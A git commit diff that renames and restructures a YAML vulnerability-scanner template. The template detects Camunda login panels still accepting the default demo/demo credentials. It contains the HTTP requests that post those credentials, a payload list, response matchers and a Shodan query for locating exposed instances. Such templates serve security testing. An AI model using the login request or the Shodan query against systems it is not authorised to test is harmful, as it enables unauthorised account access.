Update and rename camunda-default-credential.yaml to camunda-default-login.yaml

patch-1
Dhiyaneshwaran 2024-01-09 13:43:47 +05:30 committed by GitHub
parent 410b8bb586
commit 0ad7c78598
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 13 additions and 6 deletions

View File

@ -1,10 +1,11 @@
id: camunda-default-credential
id: camunda-default-login
info:
name: Camunda Login Panel - Default Login
name: Camunda - Default Login
author: bhutch
severity: high
description: Camunda login panel contains a default login vulnerability.
description: |
Camunda login panel contains a default login vulnerability.
reference:
- https://github.com/camunda/camunda-docs-manual/blob/master/content/webapps/admin/user-management.md
classification:
@ -13,7 +14,6 @@ info:
cwe-id: CWE-522
metadata:
verified: true
max-request: 4
shodan-query: http.html:"Camunda Welcome"
tags: default-login,camunda
@ -22,6 +22,7 @@ http:
- |
GET /camunda/app/welcome/default/ HTTP/1.1
Host: {{Hostname}}
- |
POST /camunda/api/admin/auth/user/default/login/welcome HTTP/1.1
Host: {{Hostname}}
@ -29,9 +30,14 @@ http:
Accept: application/json, text/plain, */*
X-Xsrf-Token: {{xsrf_token}}
username=demo&password=demo
username={{username}}&password={{password}}
cookie-reuse: true
attack: pitchfork
payloads:
username:
- demo
password:
- demo
matchers-condition: and
matchers:
@ -40,6 +46,7 @@ http:
words:
- '"userId"'
- '"authorizedApps"'
condition: and
- type: status
status: